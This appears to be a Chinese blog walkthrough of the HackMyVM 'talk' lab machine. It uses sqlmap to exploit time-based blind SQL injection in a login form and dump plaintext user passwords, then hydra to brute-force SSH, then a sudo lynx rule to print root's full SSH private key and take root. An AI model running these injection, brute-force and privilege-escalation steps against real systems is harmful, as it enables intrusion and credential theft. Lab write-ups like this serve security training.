HackMyVM-talk靶机详解WP
城南花已开 Lv5

信息收集

服务探测

是个easy的题目,超快的

扫一下,发现80端口开着,curl一下,看html源码类似一个聊天室,登入即可聊天

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
┌──(kali㉿kali)-[~/temp/talk]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:a1:14:59 PCS Systemtechnik GmbH
192.168.56.118 08:00:27:fe:ac:c1 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.972 seconds (129.82 hosts/sec). 3 responded
┌──(kali㉿kali)-[~/temp/talk]
└─$ nmap 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 07:03 EDT
Nmap scan report for 192.168.56.118
Host is up (0.0014s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
┌──(kali㉿kali)-[~/temp/talk]
└─$ curl 192.168.56.118
<!DOCTYPE html>
<html lang="en" >

<head>
<meta charset="UTF-8">
<title>chatME</title>

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">

<link rel='stylesheet prefetch' href='https://fonts.googleapis.com/css?family=Roboto:400,100,300,500,700,900|RobotoDraft:400,100,300,500,700,900'>
<link rel='stylesheet prefetch' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css'>

<link rel="stylesheet" href="css/style.css">


</head>

<body>


<!-- Form Mixin-->
<!-- Input Mixin-->
<!-- Button Mixin-->
<!-- Pen Title-->
<div class="pen-title">
<h1><!-- ChatME--></h1>
</div>
<!-- Form Module-->
<div class="module form-module">
<div class="toggle"><i class="fa fa-times fa-pencil"></i>
<div class="tooltip">Click Me</div>
</div>
<div class="form">
<h2>Login to your account</h2>
<form name="form_login" method="post" action="login.php">
<input type="text" placeholder="Username" name="username" />
<input type="password" placeholder="Password" name="password" />
<button>Login</button>
</form>
</div>
<div class="form">
<h2>Create an account</h2>
<form name="form_register" method="post" action="register.php">
<input type="text" placeholder="Your Name" name="your_name" required="required" />
<input type="text" placeholder="Username" name="username" required="required" />
<input type="password" placeholder="Password" name="password" required="required" />
<input type="email" placeholder="Email Address" name="email" />
<input type="phone" placeholder="Phone Number" name="phone" />
<button>Register</button>
</form>
</div>
<div class="cta"><!-- <a href="#">Forgot your password?</a> --><center>Developed by: PJCaraig &copy 2018</center></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src='https://codepen.io/andytran/pen/vLmRVp.js'></script>



<script src="js/index.js"></script>




</body>

</html>

SQL注入

尝试admin万能密码登录一下,结果可以的,那就有sql注入的风险了image

使用sqlmap工具直接一把梭,用burpsuite抓一下请求包,复制下来sqlmap加-l参数

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
┌──(kali㉿kali)-[~/temp/talk]
└─$ cat 1.txt
POST /login.php HTTP/1.1
Host: 192.168.56.118
Content-Length: 29
Cache-Control: max-age=0
Origin: http://192.168.56.118
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.118/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=5n6dlotn3tt231o73t9hcvftn4; _ga=GA1.1.1743286532.1727596627; _ga_6E1L856HPS=GS1.1.1727596626.1.1.1727596778.0.0.0
Connection: keep-alive

username=admin&password=admin

┌──(kali㉿kali)-[~/temp/talk]
└─$ sqlmap -l 1.txt --batch --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.8.6.3#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:10:43 /2024-09-29/

[07:10:43] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.118:80/login.php
Cookie: PHPSESSID=5n6dlotn3tt231o73t9hcvftn4; _ga=GA1.1.1743286532.1727596627; _ga_6E1L856HPS=GS1.1.1727596626.1.1.1727596778.0.0.0
POST data: username=admin&password=admin
do you want to test this URL? [Y/n/q]
> Y
[07:10:43] [INFO] testing URL 'http://192.168.56.118:80/login.php'
[07:10:43] [INFO] resuming back-end DBMS 'mysql'
[07:10:43] [INFO] using '/home/kali/.local/share/sqlmap/output/results-09292024_0710am.csv' as the CSV results file in multiple targets mode
[07:10:43] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'index.php?attempt=failed'. Do you want to apply it from now on? [Y/n] Y
[07:10:43] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 4123 FROM (SELECT(SLEEP(5)))EjVA) AND 'CgYV'='CgYV&password=admin
---
do you want to exploit this SQL injection? [Y/n] Y
[07:10:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:10:43] [INFO] fetching database names
[07:10:43] [INFO] fetching number of databases
[07:10:43] [INFO] resumed: 4
[07:10:43] [INFO] resumed: information_schema
[07:10:43] [INFO] resumed: chat
[07:10:43] [INFO] resumed: mysql
[07:10:43] [INFO] resumed: performance_schema
available databases [4]:
[*] chat ##有个chat的数据库
[*] information_schema
[*] mysql
[*] performance_schema

[07:10:43] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/kali/.local/share/sqlmap/output/results-09292024_0710am.csv'

[*] ending @ 07:10:43 /2024-09-29/##接下来看看这个库有哪些表
┌──(kali㉿kali)-[~/temp/talk]
└─$ sqlmap -l 1.txt --batch --dbs -D chat --tables
___
__H__
___ ___[(]_____ ___ ___ {1.8.6.3#dev}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:13:54 /2024-09-29/

[07:13:54] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.118:80/login.php
Cookie: PHPSESSID=5n6dlotn3tt231o73t9hcvftn4; _ga=GA1.1.1743286532.1727596627; _ga_6E1L856HPS=GS1.1.1727596626.1.1.1727596778.0.0.0
POST data: username=admin&password=admin
do you want to test this URL? [Y/n/q]
> Y
[07:13:55] [INFO] testing URL 'http://192.168.56.118:80/login.php'
[07:13:55] [INFO] resuming back-end DBMS 'mysql'
[07:13:55] [INFO] using '/home/kali/.local/share/sqlmap/output/results-09292024_0713am.csv' as the CSV results file in multiple targets mode
[07:13:55] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'index.php?attempt=failed'. Do you want to apply it from now on? [Y/n] Y
[07:13:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 4123 FROM (SELECT(SLEEP(5)))EjVA) AND 'CgYV'='CgYV&password=admin
---
do you want to exploit this SQL injection? [Y/n] Y
[07:13:55] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:13:55] [INFO] fetching database names
[07:13:55] [INFO] fetching number of databases
[07:13:55] [INFO] resumed: 4
[07:13:55] [INFO] resumed: information_schema
[07:13:55] [INFO] resumed: chat
[07:13:55] [INFO] resumed: mysql
[07:13:55] [INFO] resumed: performance_schema
available databases [4]:
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema

[07:13:55] [INFO] fetching tables for database: 'chat'
[07:13:55] [INFO] fetching number of tables for database 'chat'
[07:13:55] [INFO] resumed: 3
[07:13:55] [INFO] resumed: user
[07:13:55] [INFO] resumed: chat
[07:13:55] [INFO] resumed: chat_room
Database: chat
[3 tables]
+-----------+
| user |##有个user
| chat |
| chat_room |
+-----------+

[07:13:55] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/kali/.local/share/sqlmap/output/results-09292024_0713am.csv'

[*] ending @ 07:13:55 /2024-09-29/
┌──(kali㉿kali)-[~/temp/talk] ##下面枚举会有点慢,因为是时间盲注
└─$ sqlmap -l 1.txt --batch --dbs -D chat -T user --dump
___
__H__
___ ___[,]_____ ___ ___ {1.8.6.3#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:15:54 /2024-09-29/

[07:15:54] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.118:80/login.php
Cookie: PHPSESSID=5n6dlotn3tt231o73t9hcvftn4; _ga=GA1.1.1743286532.1727596627; _ga_6E1L856HPS=GS1.1.1727596626.1.1.1727596778.0.0.0
POST data: username=admin&password=admin
do you want to test this URL? [Y/n/q]
> Y
[07:15:54] [INFO] testing URL 'http://192.168.56.118:80/login.php'
[07:15:54] [INFO] resuming back-end DBMS 'mysql'
[07:15:54] [INFO] using '/home/kali/.local/share/sqlmap/output/results-09292024_0715am.csv' as the CSV results file in multiple targets mode
[07:15:54] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'index.php?attempt=failed'. Do you want to apply it from now on? [Y/n] Y
[07:15:54] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 4123 FROM (SELECT(SLEEP(5)))EjVA) AND 'CgYV'='CgYV&password=admin
---
do you want to exploit this SQL injection? [Y/n] Y
[07:15:54] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:15:54] [INFO] fetching database names
[07:15:54] [INFO] fetching number of databases
[07:15:54] [INFO] resumed: 4
[07:15:54] [INFO] resumed: information_schema
[07:15:54] [INFO] resumed: chat
[07:15:54] [INFO] resumed: mysql
[07:15:54] [INFO] resumed: performance_schema
available databases [4]:
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema

[07:15:54] [INFO] fetching columns for table 'user' in database 'chat'
[07:15:54] [INFO] resumed: 6
[07:15:54] [INFO] resumed: userid
[07:15:54] [INFO] resumed: username
[07:15:54] [INFO] resumed: password
[07:15:54] [INFO] resumed: your_name
[07:15:54] [INFO] resumed: email
[07:15:54] [INFO] resumed: phone
[07:15:54] [INFO] fetching entries for table 'user' in database 'chat'
[07:15:54] [INFO] fetching number of entries for table 'user' in database 'chat'
[07:15:54] [INFO] resumed: 5
[07:15:54] [INFO] resumed: [email protected]
[07:15:54] [INFO] resumed: adrianthebest
[07:15:54] [INFO] resumed: 11
[07:15:54] [INFO] resumed: 5
[07:15:54] [INFO] resumed: david
[07:15:54] [INFO] resumed: david
[07:15:54] [INFO] resumed: [email protected]
[07:15:54] [INFO] resumed: thatsmynonapass
[07:15:54] [INFO] resumed: 111
[07:15:54] [INFO] resumed: 4
[07:15:54] [INFO] resumed: jerry
[07:15:54] [INFO] resumed: jerry
[07:15:54] [INFO] resumed: [email protected]
[07:15:54] [INFO] resumed: myfriendtom
[07:15:54] [INFO] resumed: 1111
[07:15:54] [INFO] resumed: 2
[07:15:54] [INFO] resumed: nona
[07:15:54] [INFO] resumed: nona
[07:15:54] [INFO] resumed: [email protected]
[07:15:54] [INFO] resumed: pao
[07:15:54] [INFO] resumed: 09123123123
[07:15:54] [INFO] resumed: 1
[07:15:54] [INFO] resumed: pao
[07:15:54] [INFO] resumed: PaoPao
[07:15:54] [INFO] resumed: [email protected]
[07:15:54] [INFO] resumed: davidwhatpass
[07:15:54] [INFO] resumed: 11111
[07:15:54] [INFO] resumed: 3
[07:15:54] [INFO] resumed: tina
[07:15:54] [INFO] resumed: tina
Database: chat
Table: user
[5 entries]
+--------+-----------------+-------------+-----------------+----------+-----------+
| userid | email | phone | password | username | your_name |
+--------+-----------------+-------------+-----------------+----------+-----------+
| 5 | [email protected] | 11 | adrianthebest | david | david |
| 4 | [email protected] | 111 | thatsmynonapass | jerry | jerry |
| 2 | [email protected] | 1111 | myfriendtom | nona | nona |
| 1 | [email protected] | 09123123123 | pao | pao | PaoPao |
| 3 | [email protected] | 11111 | davidwhatpass | tina | tina |
+--------+-----------------+-------------+-----------------+----------+-----------+

[07:15:54] [INFO] table 'chat.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.118/dump/chat/user.csv'
[07:15:54] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/kali/.local/share/sqlmap/output/results-09292024_0715am.csv'

[*] ending @ 07:15:54 /2024-09-29/

具体参数见下表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
目标:
至少提供一个以下选项以指定目标

-u URL, --url=URL 目标 URL(例如:"http://www.site.com/vuln.php?id=1"
-d DIRECT 可直接连接数据库的地址字符串
-l LOGFILE 从 Burp 或 WebScarab 代理的日志文件中解析目标地址
-m BULKFILE 从文本文件中获取批量目标
-r REQUESTFILE 从文件中读取 HTTP 请求
-g GOOGLEDORK 使用 Google dork 结果作为目标
-c CONFIGFILE 从 INI 配置文件中加载选项
枚举:
以下选项用于获取后端 DBMS 的信息,结构和数据表中的数据

-a, --all 获取所有信息、数据
-b, --banner 获取 DBMS banner
--current-user 获取 DBMS 当前用户
--current-db 获取 DBMS 当前数据库
--hostname 获取 DBMS 服务器的主机名
--is-dba 探测 DBMS 当前用户是否为 DBA(数据库管理员)
--users 枚举出 DBMS 所有用户
--passwords 枚举出 DBMS 所有用户的密码哈希
--privileges 枚举出 DBMS 所有用户特权级
--roles 枚举出 DBMS 所有用户角色
--dbs 枚举出 DBMS 所有数据库
--tables 枚举出 DBMS 数据库中的所有表
--columns 枚举出 DBMS 表中的所有列
--schema 枚举出 DBMS 所有模式
--count 获取数据表数目
--dump 导出 DBMS 数据库表项
--dump-all 导出所有 DBMS 数据库表项
--search 搜索列,表和/或数据库名
--comments 枚举数据时检查 DBMS 注释
--statements 获取 DBMS 正在执行的 SQL 语句
-D DB 指定要枚举的 DBMS 数据库
-T TBL 指定要枚举的 DBMS 数据表
-C COL 指定要枚举的 DBMS 数据列
-X EXCLUDE 指定不枚举的 DBMS 标识符
-U USER 指定枚举的 DBMS 用户
--exclude-sysdbs 枚举所有数据表时,指定排除特定系统数据库
--pivot-column=P.. 指定主列
--where=DUMPWHERE 在转储表时使用 WHERE 条件语句
--start=LIMITSTART 指定要导出的数据表条目开始行数
--stop=LIMITSTOP 指定要导出的数据表条目结束行数
--first=FIRSTCHAR 指定获取返回查询结果的开始字符位
--last=LASTCHAR 指定获取返回查询结果的结束字符位
--sql-query=SQLQ.. 指定要执行的 SQL 语句
--sql-shell 调出交互式 SQL shell
--sql-file=SQLFILE 执行文件中的 SQL 语句

文本处理

拿到用户名和密码了,先文本处理一下,用sed将user和password分别输出一下

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(kali㉿kali)-[~/temp/talk]
└─$ cat temp.txt|awk '{print $10}'>user.txt
┌──(kali㉿kali)-[~/temp/talk]
└─$ cat temp.txt|awk '{print $8}'>pass.txt
┌──(kali㉿kali)-[~/temp/talk]
└─$ vim user.txt ##再处理一下,删除开头username,结尾换行删除
┌──(kali㉿kali)-[~/temp/talk]
└─$ vim pass.txt ##删除开头password,结尾换行删除
┌──(kali㉿kali)-[~/temp/talk]
└─$ hydra -L user.txt -P pass.txt ssh://192.168.56.118 -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-29 07:31:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.118:22/
[ATTEMPT] target 192.168.56.118 - login "david" - pass "adrianthebest" - 1 of 25 [child 0] (0/0)
[ATTEMPT] target 192.168.56.118 - login "david" - pass "thatsmynonapass" - 2 of 25 [child 1] (0/0)
[ATTEMPT] target 192.168.56.118 - login "david" - pass "myfriendtom" - 3 of 25 [child 2] (0/0)
[ATTEMPT] target 192.168.56.118 - login "david" - pass "pao" - 4 of 25 [child 3] (0/0)
[ATTEMPT] target 192.168.56.118 - login "david" - pass "davidwhatpass" - 5 of 25 [child 4] (0/0)
[ATTEMPT] target 192.168.56.118 - login "jerry" - pass "adrianthebest" - 6 of 25 [child 5] (0/0)
[ATTEMPT] target 192.168.56.118 - login "jerry" - pass "thatsmynonapass" - 7 of 25 [child 6] (0/0)
[ATTEMPT] target 192.168.56.118 - login "jerry" - pass "myfriendtom" - 8 of 25 [child 7] (0/0)
[ATTEMPT] target 192.168.56.118 - login "jerry" - pass "pao" - 9 of 25 [child 8] (0/0)
[ATTEMPT] target 192.168.56.118 - login "jerry" - pass "davidwhatpass" - 10 of 25 [child 9] (0/0)
[ATTEMPT] target 192.168.56.118 - login "nona" - pass "adrianthebest" - 11 of 25 [child 10] (0/0)
[ATTEMPT] target 192.168.56.118 - login "nona" - pass "thatsmynonapass" - 12 of 25 [child 11] (0/0)
[ATTEMPT] target 192.168.56.118 - login "nona" - pass "myfriendtom" - 13 of 25 [child 12] (0/0)
[ATTEMPT] target 192.168.56.118 - login "nona" - pass "pao" - 14 of 25 [child 13] (0/0)
[ATTEMPT] target 192.168.56.118 - login "nona" - pass "davidwhatpass" - 15 of 25 [child 14] (0/0)
[ATTEMPT] target 192.168.56.118 - login "pao" - pass "adrianthebest" - 16 of 25 [child 15] (0/0)
[22][ssh] host: 192.168.56.118 login: david password: davidwhatpass ##轻而易举就找到了
[22][ssh] host: 192.168.56.118 login: nona password: thatsmynonapass ##实际上有价值的是这个用户
[ATTEMPT] target 192.168.56.118 - login "pao" - pass "thatsmynonapass" - 17 of 25 [child 4] (0/0)
[ATTEMPT] target 192.168.56.118 - login "pao" - pass "myfriendtom" - 18 of 25 [child 11] (0/0)
[22][ssh] host: 192.168.56.118 login: jerry password: myfriendtom
[ATTEMPT] target 192.168.56.118 - login "pao" - pass "pao" - 19 of 25 [child 7] (0/0)
[RE-ATTEMPT] target 192.168.56.118 - login "pao" - pass "myfriendtom" - 19 of 25 [child 11] (0/0)
[ATTEMPT] target 192.168.56.118 - login "pao" - pass "davidwhatpass" - 20 of 25 [child 1] (0/0)
[ATTEMPT] target 192.168.56.118 - login "tina" - pass "adrianthebest" - 21 of 25 [child 2] (0/0)
[ATTEMPT] target 192.168.56.118 - login "tina" - pass "thatsmynonapass" - 22 of 25 [child 0] (0/0)
[ATTEMPT] target 192.168.56.118 - login "tina" - pass "myfriendtom" - 23 of 25 [child 3] (0/0)
[RE-ATTEMPT] target 192.168.56.118 - login "tina" - pass "myfriendtom" - 23 of 25 [child 3] (0/0)
[ATTEMPT] target 192.168.56.118 - login "tina" - pass "pao" - 24 of 25 [child 14] (0/0)
[ATTEMPT] target 192.168.56.118 - login "tina" - pass "davidwhatpass" - 25 of 25 [child 13] (0/0)
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-29 07:31:12
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
OPT 可选项

记得九头蛇不要加成功一次就停止的参数,不然你只能出一个david用户,然而这个用户没啥价值,后面就很简单了

用户提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
┌──(kali㉿kali)-[~/temp/talk]
└─$ ssh [email protected]
[email protected]'s password:
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Sep 12 04:41:29 2024 from 192.168.56.102
nona@talk:~$ cat user.txt
wordsarelies
nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nona may run the following commands on talk:
(ALL : ALL) NOPASSWD: /usr/bin/lynx
nona@talk:~$ sudo /usr/bin/lynx /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAv77p4U13Uc8EUz9mvj9gBZaegTdRuSjdOWprDQNNeZ8SllBMn5wx
e4C+Vk970XDLtzFydCx6UdgkSd6PYeVN9Sysy9UVe0COMhl3Fu0qdGn0XUAt1C9eC8jDjo
Oy2Im3CZo+hdFU08cws90DM9mgsjRvAcxj4IZuII34Q5JZ8O8/qD2WwRmfyxIebnZzd0cr
RiD9wFOa+P2tsEv4psSv+QpyD8l6vgsQkdOWSrdEI1T/zd7VzHzJhQ0ebxHuD+a5YClKjO
0dLjifPanlY+UI3uXwh9DQwvMXJ2jwxDQ2El20REbiszbaBwSl/8t2aiu0RbyeHjVmHnDG
4ciLl39/IwAAA8DQFvDG0BbwxgAAAAdzc2gtcnNhAAABAQC/vunhTXdRzwRTP2a+P2AFlp
6BN1G5KN05amsNA015nxKWUEyfnDF7gL5WT3vRcMu3MXJ0LHpR2CRJ3o9h5U31LKzL1RV7
QI4yGXcW7Sp0afRdQC3UL14LyMOOg7LYibcJmj6F0VTTxzCz3QMz2aCyNG8BzGPghm4gjf
hDklnw7z+oPZbBGZ/LEh5udnN3RytGIP3AU5r4/a2wS/imxK/5CnIPyXq+CxCR05ZKt0Qj
VP/N3tXMfMmFDR5vEe4P5rlgKUqM7R0uOJ89qeVj5Qje5fCH0NDC8xcnaPDENDYSXbRERu
KzNtoHBKX/y3ZqK7RFvJ4eNWYecMbhyIuXf38jAAAAAwEAAQAAAQEAhonOUOep8RzwS/kQ
fiy5kzI7xS6riN/DWaXxtw+6LLwQrqdpHBTcI2wSIT1kA3DBf6iSRjFvIj4mOC6RLH9YU8
8k72Bz0idZno1/ofaG82fkrgl6Hoed1Wboz/ZYZtc6NuKjPAHFI1OAOLO6q4bn2iIwQXLI
IaIxY2Y57C+kLAh7g45tkD3oW8ntRvI/EGHOguxmjlA5JVLhey6W82sEF5Z70jUz0c5Pm1
e1cluKNXsECsOHJkPzgYh4QqRLFcKEeh4M9R3jeqbAAjy3la0G8AUhylfPSu1oMmE+ivXw
s3ZFyIq7zkeafswywxTXSdenx+6EMwfUheTPxaOpjaM4AQAAAIB3cZKQCEEElLP7qlnrBg
Pp0ti7PF/9w6XTY4+7qzXZjcouvCKh0BexhBlSXTNob7chX7IvcjvF3gTK0hStChv3neY+
8fmf4PexWNCaJEp9WgmDd3hzo3Ft0IXR3UOBTIaLhqUngmnx5hUvchYvkLqzgz2Wcn5Swk
FVmm/5MLaEXgAAAIEA64J7WVUh2JgTDfDJI82rPl3OUO/MNTwu5y5oGyDK2tJ6/29TMeIT
qXlYBpTAOCv7TohPfQbhULVEqJLydJcS24OS8hYXFzZ7IwkxC/xoV+R71Gd5O77f+VtC3I
+inSu0MCWfd4VfpgwefoJ09R4VNgiqJn99nuDDz5MJPyFtrmEAAACBANBtrPHk3fzbbGW6
9n82srwRgPDlmg+/8ouj07shIfagzPqvJ1TBlqj0/YRA0509sKpKryK8/o6xhSeXMtD56O
uZDgWyRwLNdkFdpIe1qzUAwrqXvM5dWHzuH2SpJGqHq4Np60Tqezq2zxNGEcVbgO2VfO7L
Ao8ML/aJbZ80QvQDAAAACXJvb3RAdGFsawE=
-----END OPENSSH PRIVATE KEY-----
##lynx是一个开源的文本模式网页浏览器,支持HTML和XHTML标记的网页。lynx主要用于在命令行界面下访问网页,不支持图形化用户界面,具有快速、轻量和高效的特点。lynx在Linux系统下以及其他Unix-like系统中广泛使用,是一个常见的命令行工具。
##你可以理解为一个浏览器,那是浏览器就可以访问本地文件,如果你想更快的话可以直接读root下的root.txt文件,我还是上到root用户下再读也可以
┌──(kali㉿kali)-[~/temp/talk]
└─$ vim id_rsa
┌──(kali㉿kali)-[~/temp/talk]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/temp/talk]
└─$ ssh [email protected] -i id_rsa
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Sep 12 05:17:40 2024 from 192.168.56.102
root@talk:~# cat root.txt
talktomeroot

完结,easy的靶机做的很快的

由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k